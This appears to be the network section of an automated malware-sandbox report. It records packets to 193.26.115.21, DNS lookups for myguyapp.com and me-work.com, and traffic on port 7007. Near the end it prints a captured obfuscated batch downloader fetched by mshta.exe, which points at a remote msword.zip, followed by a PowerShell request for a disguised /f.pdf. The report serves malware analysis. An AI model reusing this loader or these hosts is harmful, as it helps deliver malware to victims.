                                                                      Dec 16, 2024 01:33:14.575293064 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.575342894 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.581137896 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.581157923 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.581244946 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.581264973 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.581315041 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.587527990 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.587548971 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.587587118 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.587598085 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.587615967 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.587641954 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.594392061 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.594410896 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.594453096 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.594487906 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.594505072 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.594741106 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.648747921 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.740966082 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.741007090 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.741020918 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.741030931 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.741045952 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.741070032 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.746974945 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.746994019 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.747029066 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.747039080 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.747054100 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.747081041 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.747266054 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.753844023 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.753863096 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.753897905 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.753906965 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.753932953 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.753943920 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.754323959 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.760600090 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.760618925 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.760654926 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.760664940 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.760691881 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.760701895 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.764077902 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.766612053 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.766629934 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.766793966 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.766793966 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.766858101 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.766974926 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.768731117 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.773474932 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.773494959 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.773545980 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.773571014 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.773602962 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.773861885 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.779865026 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.779884100 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.779943943 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.779983997 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.780021906 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.780333996 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.786776066 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.786793947 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.786971092 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.786971092 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.787035942 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.787122965 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.933314085 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.933350086 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.933423042 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.933458090 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.933475018 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.934755087 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.940125942 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.940146923 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.940200090 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.940211058 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.940229893 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.940253019 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.946113110 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.946134090 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.946186066 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.946196079 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.946209908 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.946234941 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.952990055 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.953008890 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.953047991 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.953058004 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.953087091 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.953099012 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.959739923 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.959759951 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.959826946 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.959844112 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.959956884 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.965737104 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.965755939 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.965918064 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.965950966 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.966000080 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.973005056 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.973021984 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.973150015 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.973150015 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.973181963 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.973229885 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.978979111 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.978997946 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.979039907 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.979053020 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:14.979068995 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:14.979172945 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.045242071 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.125511885 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.125539064 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.125585079 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.125597000 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.125622034 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.125633001 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.132316113 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.132335901 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.132397890 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.132407904 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.132455111 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.138326883 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.138345957 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.138403893 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.138416052 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.138457060 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.145236015 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.145256042 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.145306110 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.145318031 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.145332098 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.146753073 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.151979923 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.152002096 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.152051926 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.152062893 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.152103901 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.158813953 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.158833981 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.158868074 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.158878088 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.158894062 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.158912897 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.165201902 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.165221930 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.165282011 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.165316105 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.165345907 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.165364027 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.171236992 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.171257973 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.171406031 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.171406031 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.171473026 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.171535015 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.318005085 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.318037033 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.318253040 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.318253994 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.318317890 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.318670034 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.324553967 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.324573994 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.324775934 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.324775934 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.324842930 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.326788902 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.330606937 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.330626011 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.330725908 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.330790043 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.331132889 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.337559938 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.337578058 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.337718964 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.337719917 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.337784052 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.338536978 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.344285965 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.344305992 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.344358921 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.344429970 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.344470024 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.344763041 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.351058960 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.351078033 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.351238012 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.351238012 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.351340055 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.351403952 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.359509945 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.359529018 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.359747887 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.359747887 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.359812975 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.359882116 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.363452911 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.363472939 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.363677979 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.517054081 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.517081976 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.517206907 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.523078918 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.523101091 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.523143053 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.523154020 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.523175955 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.523195982 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.529889107 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.529907942 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.529983044 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.529994011 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.530071020 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.536633015 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.536652088 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.536721945 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.536731005 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.536820889 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.540582895 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.540627003 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.540664911 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.540674925 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.540690899 CET44349737193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:33:15.540736914 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.674932957 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.691405058 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:33:15.805083990 CET49737443192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:42.227025986 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:42.347002029 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:35:42.350204945 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:42.508446932 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:42.628274918 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:35:52.437011957 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:35:52.486336946 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:55.067780972 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:35:55.187614918 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:07.627599955 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:07.747661114 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:20.189992905 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:20.309828997 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:22.453200102 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:22.502094030 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:32.744256020 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:32.864445925 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:45.299593925 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:45.419668913 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:51.018516064 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:51.138559103 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:52.453777075 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:52.508641958 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:55.096498013 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:55.216522932 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:55.216717005 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:55.336529016 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:36:59.487060070 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:36:59.607223988 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:37:02.637310982 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:37:02.757396936 CET700749994193.26.115.21192.168.2.4
                                                                      Dec 16, 2024 01:37:05.400293112 CET499947007192.168.2.4193.26.115.21
                                                                      Dec 16, 2024 01:37:05.520689964 CET700749994193.26.115.21192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 16, 2024 01:32:59.766530037 CET5813553192.168.2.41.1.1.1
                                                                      Dec 16, 2024 01:33:00.076527119 CET53581351.1.1.1192.168.2.4
                                                                      Dec 16, 2024 01:33:15.439070940 CET6537953192.168.2.41.1.1.1
                                                                      Dec 16, 2024 01:33:52.114818096 CET5617153192.168.2.41.1.1.1
                                                                      Dec 16, 2024 01:33:52.349203110 CET53561711.1.1.1192.168.2.4
                                                                      Dec 16, 2024 01:35:41.950181961 CET6247953192.168.2.41.1.1.1
                                                                      Dec 16, 2024 01:35:42.223546982 CET53624791.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Dec 16, 2024 01:32:59.766530037 CET192.168.2.41.1.1.10x9b26Standard query (0)myguyapp.comA (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 01:33:15.439070940 CET192.168.2.41.1.1.10xd605Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 01:33:52.114818096 CET192.168.2.41.1.1.10x713dStandard query (0)dwLscOsEZmpbOxr.dwLscOsEZmpbOxrA (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 01:35:41.950181961 CET192.168.2.41.1.1.10xb911Standard query (0)me-work.comA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Dec 16, 2024 01:33:00.076527119 CET1.1.1.1192.168.2.40x9b26No error (0)myguyapp.com193.26.115.21A (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 01:33:15.661242008 CET1.1.1.1192.168.2.40xd605No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 16, 2024 01:33:52.349203110 CET1.1.1.1192.168.2.40x713dName error (3)dwLscOsEZmpbOxr.dwLscOsEZmpbOxrnonenoneA (IP address)IN (0x0001)false
                                                                      Dec 16, 2024 01:35:42.223546982 CET1.1.1.1192.168.2.40xb911No error (0)me-work.com193.26.115.21A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • myguyapp.com

                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449732193.26.115.214431368C:\Windows\SysWOW64\mshta.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-16 00:33:01 UTC301OUTGET /c.bat HTTP/1.1
                                                                      Accept: */*
                                                                      Accept-Language: en-CH
                                                                      Accept-Encoding: gzip, deflate
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                      Host: myguyapp.com
                                                                      Connection: Keep-Alive
                                                                      2024-12-16 00:33:01 UTC288INHTTP/1.1 200 OK
                                                                      Date: Mon, 16 Dec 2024 00:33:01 GMT
                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                      Last-Modified: Thu, 12 Dec 2024 13:28:45 GMT
                                                                      ETag: "d68-62912b1984ca1"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 3432
                                                                      Connection: close
                                                                      Content-Type: application/x-msdownload
                                                                      2024-12-16 00:33:01 UTC3432INData Raw: 40 25 47 68 61 45 25 65 25 51 4f 4e 25 63 25 6f 56 4e 6c 78 68 53 25 68 25 59 63 63 25 6f 25 54 5a 53 47 5a 64 54 7a 73 67 25 20 25 6d 43 52 70 25 6f 25 6d 59 73 66 5a 70 58 42 75 50 25 66 25 64 65 6a 54 4d 76 25 66 25 72 4f 59 53 65 66 45 4f 25 0d 0a 73 65 74 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6d 79 67 75 79 61 70 70 2e 63 6f 6d 2f 6d 73 77 6f 72 64 2e 7a 69 70 0d 0a 73 25 66 59 55 73 62 6e 6f 25 65 25 6d 48 46 71 7a 4c 6c 76 6b 57 25 74 25 68 55 42 76 4b 4f 51 74 57 25 20 25 42 74 61 44 72 73 4a 63 4b 25 75 25 62 77 6a 25 72 25 62 6a 62 25 6c 25 63 70 73 57 54 78 25 3d 25 43 4d 79 66 61 49 25 68 25 4e 4e 44 43 25 74 25 53 5a 47 25 74 25 73 67 25 70 25 77 79 74 64 58 73 48 25 73 25 58 4c 66 59 52 68 4f 25 3a 25 62 77 61 58 4a 53 5a 63 72 25 2f 25 76
                                                                      Data Ascii: @%GhaE%e%QON%c%oVNlxhS%h%Ycc%o%TZSGZdTzsg% %mCRp%o%mYsfZpXBuP%f%dejTMv%f%rOYSefEO%set url=https://myguyapp.com/msword.zips%fYUsbno%e%mHFqzLlvkW%t%hUBvKOQtW% %BtaDrsJcK%u%bwj%r%bjb%l%cpsWTx%=%CMyfaI%h%NNDC%t%SZG%t%sg%p%wytdXsH%s%XLfYRhO%:%bwaXJSZcr%/%v


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449734193.26.115.214437104C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-12-16 00:33:04 UTC162OUTGET /f.pdf HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                      Host: myguyapp.com
                                                                      Connection: Keep-Alive
